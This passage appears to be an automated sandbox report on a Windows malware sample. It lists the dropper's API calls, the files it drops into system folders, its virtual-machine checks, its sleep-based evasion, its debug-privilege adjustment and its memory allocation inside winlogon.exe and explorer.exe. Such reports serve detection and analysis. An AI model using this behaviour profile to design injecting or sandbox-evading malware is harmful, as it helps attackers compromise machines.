A,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeWindow / User API: threadDelayed 2302Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeWindow / User API: threadDelayed 7284Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeDropped PE file which has not been started: C:\Windows\SysWOW64\ehmehut.dllJump to dropped file
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\osgobah.dllJump to dropped file
Source: C:\Windows\SysWOW64\edsuvoov-usum.exe TID: 8008Thread sleep count: 2302 > 30Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exe TID: 8008Thread sleep time: -2302000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exe TID: 8092Thread sleep count: 62 > 30Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exe TID: 8092Thread sleep time: -37200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exe TID: 8008Thread sleep count: 7284 > 30Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exe TID: 8008Thread sleep time: -7284000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeThread delayed: delay time: 600000Jump to behavior
Source: explorer.exe, 00000005.00000003.2213841197.0000000008C9E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000002.3824992663.0000000008B09000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000005.00000002.3824992663.0000000008B09000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000004
Source: explorer.exe, 00000005.00000003.3078024513.0000000008B78000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000002.3817558651.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000"
Source: edsuvoov-usum.exe, 00000001.00000003.3648952417.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3624526051.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817754289.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629814969.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3591514771.0000000000781000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3648952417.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3624526051.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111460280.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000000.1360878216.0000000008A46000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: explorer.exe, 00000005.00000000.1358557558.00000000030F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000005.00000003.2211387274.0000000008CCB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000y@
Source: explorer.exe, 00000005.00000002.3824992663.0000000008B09000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTroVMWare
Source: explorer.exe, 00000005.00000000.1360878216.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2210576179.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3078024513.0000000008B38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3824992663.0000000008B09000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: explorer.exe, 00000005.00000002.3827604325.0000000008D2F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}-
Source: explorer.exe, 00000005.00000002.3817558651.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000R
Source: 5SGOAKv7AR.exe, 00000000.00000002.1354564894.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000005.00000002.3827604325.0000000008D2F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.1358557558.00000000030F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001G
Source: explorer.exe, 00000005.00000002.3818820442.00000000031BA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 mov eax, dword ptr fs:[00000030h]0_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 1_2_00403A19 mov eax, dword ptr fs:[00000030h]1_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 3_2_00403A19 mov eax, dword ptr fs:[00000030h]3_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 33890000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8540000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8040000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8510000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 86E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9020000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9030000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: A520000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ADC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B0B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B0E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B5C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B5D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B680000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B660000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B670000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B690000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B6A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: B6B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C6E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C6F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E410000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E420000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 7790000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 83B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8360000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 83C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 83D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 83E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8400000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8410000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8420000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8EA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8EB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8EC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8EF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8ED0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8EE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9040000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BAC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BAD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BB00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BAE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BAF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: F00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: F20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: F30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: F40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: F50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BB20000 protect: page read and writeJump to behavior
